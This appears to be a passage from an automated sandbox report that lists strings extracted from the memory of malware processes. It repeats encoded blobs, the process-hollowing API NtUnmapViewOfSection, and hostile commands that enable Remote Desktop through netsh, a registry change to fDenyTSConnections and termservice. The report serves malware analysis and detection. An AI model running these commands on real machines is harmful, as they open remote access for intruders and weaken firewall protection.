ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000002.1802597444.0000000000681000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000002.1802597444.0000000000681000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000B.00000003.1762219821.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000B.00000003.1762219821.0000000004E50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000003.1767560692.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000003.1767560692.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 0000000C.00000002.1807784692.0000000000681000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 0000000C.00000002.1807784692.0000000000681000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	String found in binary or memory: net start termservice
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000D.00000003.1788630299.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000D.00000003.1788630299.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000D.00000002.1829256764.0000000000901000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: net start termservice
Source: TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE, 0000000D.00000002.1829256764.0000000000901000.00000040.00000001.01000000.0000000B.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM 